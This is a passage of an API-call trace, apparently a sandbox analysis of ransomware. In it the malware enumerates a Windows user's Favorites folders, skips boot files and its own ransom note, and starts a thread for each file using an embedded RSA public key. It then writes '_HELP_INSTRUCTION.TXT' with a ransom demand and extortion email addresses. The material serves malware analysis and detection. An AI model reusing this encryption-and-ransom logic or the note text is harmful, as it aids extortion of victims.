bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0110.060] lstrcpyW (in: lpString1=0x17be7c, lpString2="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" | out: lpString1="15DC3754190A8EA84ED7A99B1D2272F0.XZZX") returned="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" [0110.060] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0110.060] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x450 [0110.061] Sleep (dwMilliseconds=0x96) [0110.204] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0110.204] lstrcmpW (lpString1="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpString2="..") returned 1 [0110.204] lstrcmpW (lpString1="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpString2=".") returned 1 [0110.204] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0110.204] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="ntldr") returned 0x0 [0110.204] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="NTLDR") returned 0x0 [0110.204] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0110.204] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="ntdetect.com") returned 0x0 [0110.204] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0110.204] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0110.204] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 50 [0110.204] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0110.204] lstrcpyW (in: lpString1=0x17be7c, lpString2="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" | out: lpString1="8E5ECE9444DBAF1A59BC413E48F39362.XZZX") returned="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" [0110.204] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0110.204] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x454 [0110.205] Sleep (dwMilliseconds=0x96) [0110.360] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0110.360] lstrcmpW (lpString1="B8440918056E9F026EA48C8C0986834A.XZZX", lpString2="..") returned 1 [0110.360] lstrcmpW (lpString1="B8440918056E9F026EA48C8C0986834A.XZZX", lpString2=".") returned 1 [0110.360] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0110.360] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="ntldr") returned 0x0 [0110.360] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="NTLDR") returned 0x0 [0110.360] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0110.360] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0110.360] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0110.360] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0110.360] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 50 [0110.360] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0110.360] lstrcpyW (in: lpString1=0x17be7c, lpString2="B8440918056E9F026EA48C8C0986834A.XZZX" | out: lpString1="B8440918056E9F026EA48C8C0986834A.XZZX") returned="B8440918056E9F026EA48C8C0986834A.XZZX" [0110.360] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0110.360] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x458 [0110.361] Sleep (dwMilliseconds=0x96) [0110.516] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0110.516] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0110.516] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0110.516] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0110.516] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0110.516] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0110.517] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0110.517] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0110.517] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*" [0110.517] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0110.517] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0110.517] SetErrorMode (uMode=0x1) returned 0x1 [0110.517] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\_HELP_INSTRUCTION.TXT") returned 67 [0110.517] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0110.517] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0110.517] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x45c) returned 0x0 [0110.517] RegQueryValueExW (in: hKey=0x45c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbafe0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3cbafe0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0110.517] RegCloseKey (hKey=0x45c) returned 0x0 [0110.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0110.518] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0110.518] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0110.527] CloseHandle (hObject=0x45c) returned 1 [0110.528] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0110.528] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="Links" [0110.528] lstrcpyW (in: lpString1=0x17b644, lpString2="Links" | out: lpString1="Links") returned="Links" [0110.528] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0110.528] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.528] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0110.528] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.528] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0110.528] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0110.528] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0110.528] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0110.528] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0110.528] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0110.528] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0110.528] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0110.528] lstrcmpW (lpString1="Microsoft Websites", lpString2="..") returned 1 [0110.528] lstrcmpW (lpString1="Microsoft Websites", lpString2=".") returned 1 [0110.528] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0110.528] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0110.528] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Microsoft Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0110.528] SetErrorMode (uMode=0x1) returned 0x1 [0110.528] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0110.529] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0110.529] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0110.529] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*" [0110.529] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0110.530] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="Microsoft Websites" [0110.530] lstrcpyW (in: lpString1=0x17b644, lpString2="Microsoft Websites" | out: lpString1="Microsoft Websites") returned="Microsoft Websites" [0110.530] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0110.530] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0110.530] lstrcmpW (lpString1="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpString2="..") returned 1 [0110.530] lstrcmpW (lpString1="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpString2=".") returned 1 [0110.530] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0110.530] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="ntldr") returned 0x0 [0110.530] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="NTLDR") returned 0x0 [0110.530] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0110.530] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="ntdetect.com") returned 0x0 [0110.530] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0110.530] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0110.530] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0110.530] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0110.531] lstrcpyW (in: lpString1=0x17be7c, lpString2="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" | out: lpString1="1844FE2A092A01627C9EB5E50D41E5AA.XZZX") returned="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" [0110.531] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0110.531] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x464 [0110.531] Sleep (dwMilliseconds=0x96) [0110.672] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0110.672] lstrcmpW (lpString1="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpString2="..") returned 1 [0110.672] lstrcmpW (lpString1="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpString2=".") returned 1 [0110.672] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0110.672] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="ntldr") returned 0x0 [0110.672] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="NTLDR") returned 0x0 [0110.672] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0110.672] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0110.672] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0110.672] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0110.672] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0110.672] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0110.672] lstrcpyW (in: lpString1=0x17be7c, lpString2="1B49B9E018F35807975DC8201D0B3C4F.XZZX" | out: lpString1="1B49B9E018F35807975DC8201D0B3C4F.XZZX") returned="1B49B9E018F35807975DC8201D0B3C4F.XZZX" [0110.672] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0110.672] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x468 [0110.673] Sleep (dwMilliseconds=0x96) [0110.828] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0110.828] lstrcmpW (lpString1="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpString2="..") returned 1 [0110.828] lstrcmpW (lpString1="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpString2=".") returned 1 [0110.828] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0110.828] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="ntldr") returned 0x0 [0110.828] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="NTLDR") returned 0x0 [0110.828] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0110.828] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="ntdetect.com") returned 0x0 [0110.828] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0110.828] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0110.828] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0110.828] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 